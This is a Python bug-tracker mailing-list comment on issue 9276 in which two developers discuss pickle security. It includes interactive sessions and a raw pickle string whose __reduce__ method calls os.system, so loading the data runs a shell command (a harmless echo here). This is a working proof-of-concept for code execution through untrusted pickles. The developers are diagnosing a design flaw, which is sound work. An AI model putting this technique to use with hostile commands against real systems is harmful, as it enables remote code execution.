Marc-Andre Lemburg <[email protected]> added the comment:
M.-A. Lemburg wrote:
> Jean-Paul Calderone wrote:
>>
>> Jean-Paul Calderone <[email protected]> added the comment:
>>
>> For example:
>>
>> exar...@boson:~$ python
>> Python 2.6.4 (r264:75706, Dec 7 2009, 18:45:15)
>> [GCC 4.4.1] on linux2
>> Type "help", "copyright", "credits" or "license" for more information.
>>>>> class x(object):
>> ... def __reduce__(self):
>> ... import os
>> ... return os.system, ('echo "Hello from sploitland"',)
>> ...
>>>>> import pickle
>>>>> pickle.loads(pickle.dumps(x()))
>> Hello from sploitland
>> 0
>
> But here you are not transferring malicious code in the pickle
> string, you are just triggering the execution of such code that
> you already have (and are in control of).
>
> Without the definition of class x on the receiving side, there
> would be no exploit.
>
> By adding support for pickling code objects, you'd make it possible
> to place the definition of class x into the pickle string and
> you would no longer be in control of that code.
Hmm, I just tried the code and it seems that you're right:
The pickle string does not contain a reference to class x,
but only the name of the function to call. Wow, that's a huge
hole in Python's pickle system...
... def __reduce__(self):
... import os
... return os.system, ('echo "Bingo"',)
...
>>> import pickle
>>> pickle.dumps(C())
'cposix\nsystem\np0\n(S\'echo "Bingo"\'\np1\ntp2\nRp3\n.'
>>> C = None
>>> s = 'cposix\nsystem\np0\n(S\'echo "Bingo"\'\np1\ntp2\nRp3\n.'
>>> pickle.loads(s)
Bingo
0
----------
_______________________________________
Python tracker <[email protected]>
<http://bugs.python.org/issue9276>
_______________________________________
_______________________________________________
Python-bugs-list mailing list
Unsubscribe:
http://mail.python.org/mailman/options/python-bugs-list/archive%40mail-archive.com
